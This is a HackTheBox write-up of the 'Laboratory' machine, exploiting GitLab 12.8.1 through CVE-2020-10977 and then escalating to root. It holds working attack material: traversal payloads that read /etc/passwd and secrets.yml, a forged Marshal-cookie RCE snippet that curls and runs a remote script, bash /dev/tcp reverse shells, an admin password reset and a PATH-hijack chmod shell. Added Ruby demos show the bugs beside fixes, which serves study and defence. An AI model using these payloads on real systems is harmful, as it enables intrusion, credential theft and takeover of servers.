
Hackthebox Laboratory writeup

Introduction

Column       Details
Name         Laboratory
IP           10.10.10.216
Points       20
OS           Linux
Difficulty   Easy
Creator      0xc45
Out On       14 Nov 2020

Summary

From the DNS name in the TLS certificate's Subject Alternative Name I found a second vhost, git.laboratory.htb, which hosts GitLab. The installed GitLab version (12.8.1) is vulnerable to an arbitrary file read via the Uploads Rewriter that chains into RCE; exploiting the RCE gives an initial shell inside a docker container. From there I reset the admin account's password with gitlab-rails console and logged in to GitLab as him, found a private SSH key in one of his project repos, and logged in as dexter. dexter has access to a SUID binary called docker-security; analysing its main function with radare2 shows it runs chmod without the full path, so PATH hijacking gives root.


Recon

Nmap


┌─[root@d3dsec]─[~/Desktop/HTB/Laboratory]
└──╼ #cat nmap/result.nmap 
# Nmap 7.80 scan initiated Sun Sep 27 08:19:05 2020 as: nmap -sC -sV -oA /result 10.10.10.216
Nmap scan report for 10.10.10.216
Host is up (0.28s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open  ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Laboratory
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after:  2024-03-03T10:39:28
| tls-alpn: 
|_  http/1.1
Service Info: Host: laboratory.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.32 seconds

Three ports are open: 22 (SSH), 80 (HTTP, which redirects to https://laboratory.htb/) and 443 (HTTPS).

Before going further, note the sub-domain in the nmap result: the certificate's Subject Alternative Name lists DNS:git.laboratory.htb. Add both laboratory.htb and git.laboratory.htb to /etc/hosts, pointing at 10.10.10.216.

Port-80

Port 80 redirects to https://laboratory.htb/, which serves a simple website template.

The interesting part is that the site names some users (dexter, the CEO, among them); worth noting for later.

git.laboratory.htb

git.laboratory.htb hosts a GitLab instance.

Let's register an account. Registering with an arbitrary e-mail address is rejected; after some trial and error, an address on the laboratory.htb domain (dedsec@laboratory.htb) is accepted.

The login succeeds.

The issues page reveals some more usernames.

gobuster finds nothing interesting, so let's check the help page (/help), which shows the GitLab version to any logged-in user: 12.8.1. Searching for that version turns up a published GitLab security issue (CVE-2020-10977) describing an arbitrary file read that can be chained into RCE:

Link : Arbitrary file read via the Uploads Rewriter when moving an issue

The report walks through the exploit step by step and includes a proof-of-concept video.

Step 1

Create a project called 1st_project (any name will do).

Step 2

Create a second project, called 2nd_project here.

Step 3

In the second project, go to the issues page and click New issue. Give the issue any title, paste the following as the description and submit it:

![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)

Now click Move issue, choose 1st_project as the target and click Move. When an issue is moved, the Uploads Rewriter copies every upload referenced in the description into the target project, and it builds the source path from the markdown without checking that it stays inside the uploads directory, so the ../ sequence walks out to /etc/passwd. The moved issue now carries /etc/passwd of the machine as an attachment; download it.
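To make the file read concrete, here is an added example (not code from the report, the writeup or GitLab itself) that mirrors the vulnerable path resolution of the uploads rewriter in plain Ruby and puts the fix beside it. The regex, the function names and the temporary-directory layout are assumptions made for this demo; GitLab's real rewriter goes through CarrierWave, which this stand-in simplifies to a path join.

```ruby
require "tmpdir"
require "fileutils"

# Markdown upload reference as GitLab writes it: ![name](/uploads/<32-hex-secret>/<filename>).
# The regex is a simplification written for this example.
UPLOAD_REF = %r{!?\[[^\]]*\]\(/uploads/(?<secret>\h{32})/(?<filename>[^)]+)\)}

# Vulnerable shape of the bug: the secret and filename from the description are
# joined onto the uploads root and normalised, but never checked against the root,
# so "../" sequences in the filename walk out of the uploads directory.
def vulnerable_upload_path(uploads_root, description)
  m = UPLOAD_REF.match(description) or return nil
  File.expand_path(File.join(uploads_root, m[:secret], m[:filename]))
end

# Hardened: after normalising, require that the result still lies under the root.
# (File.expand_path is lexical; also call File.realpath on the result if symlinks
# inside the uploads tree are a concern.)
def hardened_upload_path(uploads_root, description)
  m = UPLOAD_REF.match(description) or return nil
  root = File.expand_path(uploads_root)
  candidate = File.expand_path(File.join(m[:secret], m[:filename]), root)
  candidate.start_with?(root + File::SEPARATOR) ? candidate : nil
end

# Demo on a throwaway directory: a constructed "secrets.yml" sits one level above
# the uploads root, and an issue description points at it with the same traversal
# the writeup uses (constructed input, not data from the box).
def demo
  Dir.mktmpdir do |dir|
    uploads_root = File.join(dir, "uploads")
    FileUtils.mkdir_p(uploads_root)
    File.write(File.join(dir, "secrets.yml"), "secret_key_base: constructed-for-demo\n")
    description = "![a](/uploads/#{'1' * 32}/../../secrets.yml)"

    leaked = File.read(vulnerable_upload_path(uploads_root, description))
    blocked = hardened_upload_path(uploads_root, description)
    { leaked: leaked, blocked: blocked }
  end
end

if $PROGRAM_NAME == __FILE__
  r = demo
  puts "vulnerable resolver read: #{r[:leaked].inspect}"
  puts "hardened resolver returned: #{r[:blocked].inspect}"
end
```

The point of the hardened version is that normalising the path is not enough on its own: the check that the expanded result still starts with the uploads root (plus a separator, so a sibling directory with the same prefix does not pass) is what actually stops the traversal.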

Reading further in the report, the RCE part needs the instance's secrets.yml: the secret_key_base in it is what Rails uses to sign cookies, and with it we can forge a signed cookie that the server will deserialize.

So for this we need a local GitLab server to generate the cookie; I use docker to install one.

But first we need to dump secrets.yml from the server.

I use the same issue-move process, changing only the target path in the payload (the ../ traversal stays the same):

![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml)

And we got secrets.yml.

Let's download it and check its contents.

We only need secret_key_base.

# This file is managed by gitlab-ctl. Manual changes will be
# erased! To change the contents below, edit /etc/gitlab/gitlab.rb
# and run `sudo gitlab-ctl reconfigure`.

---
production:
  db_key_base: 627773a77f567a5853a5c6652018f3f6e41d04aa53ed1e0df33c66b04ef0c38b88f402e0e73ba7676e93f1e54e425f74d59528fb35b170a1b9d5ce620bc11838
  secret_key_base: 3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3
  otp_key_base: db3432d6fa4c43e68bf7024f3c92fea4eeea1f6be1e6ebd6bb6e40e930f0933068810311dc9f0ec78196faa69e0aac01171d62f4e225d61e0b84263903fd06af
  openid_connect_signing_key: |
    -----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----

Now we're all set; let's resume the docker process.

First pull the same GitLab version into docker:

sudo docker pull gitlab/gitlab-ee:12.8.1-ee.0

Then start a shell inside a container from that image:

docker run -it gitlab/gitlab-ee:12.8.1-ee.0 sh

Inside the container, start GitLab's service supervisor in the background:

/opt/gitlab/embedded/bin/runsvdir-start &

You might get a few errors; just ignore them.

Now reconfigure GitLab:

gitlab-ctl reconfigure

After the reconfigure we need to change one file, secrets.yml:

nano /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml

Replace the secret_key_base line with the value dumped from the server. secret_key_base is the key Rails uses to sign cookies, so with the target's value the local console produces signatures the target accepts.

Important: edit only that one line, secret_key_base, and leave the other keys as they are.

After saving the file, open the Rails console:

gitlab-rails console

Then copy the whole snippet below and paste it into the gitlab-rails console. It builds a signed cookie whose Marshal payload runs our command when the target deserializes it (change the IP to your own):

# Build a request object so Rails' cookie jar can be used outside a web request
request = ActionDispatch::Request.new(Rails.application.env_config)
# Force the Marshal serializer: the payload is a serialized Ruby object, not JSON
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar
# ERB whose template runs our command; ERB#result evaluates it
erb = ERB.new("<%= `curl 10.10.14.68/dedsec.sh -o /tmp/dedsec.sh && chmod 777 /tmp/dedsec.sh && bash /tmp/dedsec.sh` %>")
# Proxy that forwards any method call on the deserialized object (e.g. inspect) to erb.result
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
# Sign with secret_key_base so the target accepts the cookie, then print it
cookies.signed[:cookie] = depr
puts cookies[:cookie]

After pasting the whole snippet, the console prints the signed cookie.

Next, in a new terminal, create a file called dedsec.sh with the following content (10.10.14.XX is your own tun0 address) and save it:

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.XX/9001 0>&1

Then serve it over HTTP and start a netcat listener:

python3 -m http.server 80

nc -nvlp 9001

With everything set, one curl request to the server gets us the reverse shell. GitLab reads the experimentation_subject_id cookie as a signed cookie, so a Marshal payload signed with the stolen secret_key_base is deserialized server-side and the proxy object runs our command. Paste the cookie generated in the rails console as the value of experimentation_subject_id (if it contains + or / characters, URL-encode them first, since Rack decodes the cookie header):

curl -k -vvv 'https://git.laboratory.htb/users/sign_in' -b "experimentation_subject_id=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--2e5cdf517c1458398368af1d8c97be6b4708bba0"

Boom, we got the reverse shell, inside the GitLab container.

Since GitLab is installed there, we can use gitlab-rails console on the box itself to change the admin user's password.

But first upgrade the shell so the console is usable, then open it:

python3 -c 'import pty; pty.spawn("/bin/sh")'
gitlab-rails console

How to reset your root password

The GitLab documentation linked above describes how to reset a password from the gitlab-rails console.

With its help, let's change dexter's password, because laboratory.htb lists dexter as the CEO, so his account is the interesting one to work with.

We also cross-check who the admin is; user id 1 is the instance's first (admin) account:

u = User.where(id:1).first

The console shows that dexter is the admin of the GitLab.

Now let's reset dexter's password. Run the following commands one by one:

u.password = 'dedsec@12345'
u.password_confirmation = 'dedsec@12345'
u.save!
exit

u.save! writes the change and raises if a validation fails, so a problem shows up as an error rather than a silent no-op.

Now let's go to the site and log in as dexter.

user = dexter
password = dedsec@12345

And we're logged in.

Go to his second repo, because its description says it holds personal stuff.

Let's browse to dexter -> .ssh -> id_rsa.

And we got dexter's id_rsa. Save it locally, set its permissions to 600 (ssh refuses keys readable by others) and ssh in as dexter.

Privilege escalation

Let's run LinPEAS.

LinPEAS - Linux Privilege Escalation Awesome Script

LinPEAS flags an interesting file: /usr/local/bin/docker-security.

Let's go to that location and check what kind of file it is.

It is a binary with the SUID bit set. Let's check its contents.

It calls chmod on something, but it isn't clear from the strings alone what the file does.

So I ran pspy in one session, then ran the binary in another, and saw the following processes appear after starting docker-security:

2020/11/17 07:10:34 CMD: UID=0    PID=77936  | /usr/local/bin/docker-security
2020/11/17 07:10:34 CMD: UID=0    PID=77938  | sh -c chmod 700 /usr/bin/docker
2020/11/17 07:10:34 CMD: UID=0    PID=77939  | sh -c chmod 660 /var/run/docker.sock
2020/11/17 07:10:34 CMD: UID=0    PID=77940  | sh -c chmod 660 /var/run/docker.sock

The binary runs sh -c "chmod 700 /usr/bin/docker" and sh -c "chmod 660 /var/run/docker.sock", calling chmod by name instead of the full path /usr/bin/chmod. The shell resolves a bare name through PATH, and the process runs as UID 0 (see the pspy output), so whatever chmod is found first on PATH runs as root.

So this is exploitable by PATH hijacking.

If you don't know about PATH hijacking, read this article:

Linux Privilege Escalation Using PATH Variable

So let's use PATH hijacking for privilege escalation.

We create a file called chmod containing the bash reverse shell (the same one as dedsec.sh), make it executable, and run docker-security with our directory first in PATH while nc -nvlp 9001 is listening:

cd /tmp
printf '#!/bin/bash\nbash -i >& /dev/tcp/10.10.14.XX/9001 0>&1\n' > chmod
chmod +x ./chmod
PATH=$(pwd):$PATH docker-security
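The following is an added example, not code from the writeup or from the box, that reproduces the PATH hijack end to end without needing root: a stand-in for docker-security shells out to a bare chmod, a fake chmod is planted in a controlled directory that is put first in PATH, and the fixed variant that names chmod by absolute path is run beside it. The function names, the trusted-path list and the temporary-directory layout are assumptions for the demo; the real docker-security is a compiled SUID binary.

```ruby
require "tmpdir"
require "fileutils"

# Stand-in for the SUID binary (hypothetical; the real docker-security is compiled):
# it shells out to chmod by bare name, so /bin/sh resolves "chmod" through the
# PATH it inherited from whoever invoked it.
def vulnerable_fix_perms(target, path_env)
  system({ "PATH" => path_env }, "/bin/sh", "-c", "chmod 700 #{target}")
end

# Fix: name chmod by absolute path, taken from a fixed trusted list, so the
# caller's PATH is never consulted. The same applies to a C binary using
# system("/usr/bin/chmod ...") instead of system("chmod ...").
TRUSTED_CHMOD = %w[/usr/bin/chmod /bin/chmod].find { |p| File.executable?(p) }

def hardened_fix_perms(target, path_env)
  system({ "PATH" => path_env }, TRUSTED_CHMOD, "700", target)
end

# Attacker side: drop a script named chmod into a directory we control. Here it
# only records the arguments it was called with instead of changing permissions;
# on the real box this is where the reverse shell goes.
def plant_fake_chmod(dir)
  marker = File.join(dir, "hijacked")
  fake = File.join(dir, "chmod")
  File.write(fake, "#!/bin/sh\necho \"$@\" > #{marker}\n")
  File.chmod(0o755, fake)
  marker
end

# Run both variants with the attacker's directory first in PATH, the equivalent of
# PATH=$(pwd):$PATH docker-security, and report whether the fake chmod ran and
# what mode the target ended up with.
def demo
  Dir.mktmpdir do |dir|
    marker = plant_fake_chmod(dir)
    target = File.join(dir, "docker")          # stands in for /usr/bin/docker
    File.write(target, "")
    File.chmod(0o644, target)
    hijacked_path = "#{dir}:#{ENV.fetch('PATH', '/usr/bin:/bin')}"

    vulnerable_fix_perms(target, hijacked_path)
    vuln = { fake_ran: File.exist?(marker), mode: File.stat(target).mode & 0o777 }
    FileUtils.rm_f(marker)

    hardened_fix_perms(target, hijacked_path)
    hard = { fake_ran: File.exist?(marker), mode: File.stat(target).mode & 0o777 }

    { vulnerable: vuln, hardened: hard }
  end
end

if $PROGRAM_NAME == __FILE__
  r = demo
  puts "bare 'chmod'  -> fake chmod ran: #{r[:vulnerable][:fake_ran]}, mode now #{format('%o', r[:vulnerable][:mode])}"
  puts "absolute path -> fake chmod ran: #{r[:hardened][:fake_ran]}, mode now #{format('%o', r[:hardened][:mode])}"
end
```

With the bare name the fake chmod runs and the target keeps mode 644, because the real chmod was never reached; with the absolute path the fake is ignored and the target becomes 700. A privileged binary should also reset PATH to a known value before calling any shell, but as the example shows, the absolute path alone closes this hole.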
                                                                

And we pwned it.

If you liked the writeup, support a student in getting the OSCP cert: Donation for OSCP

Resources

reset your root password: https://docs.gitlab.com/12.10/ee/security/reset_root_password.html
Linux Privilege Escalation Using PATH Variable: https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/
LinPEAS: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
This post is licensed under CC BY 4.0


© 2020 Dedinfosec . All rights reserved.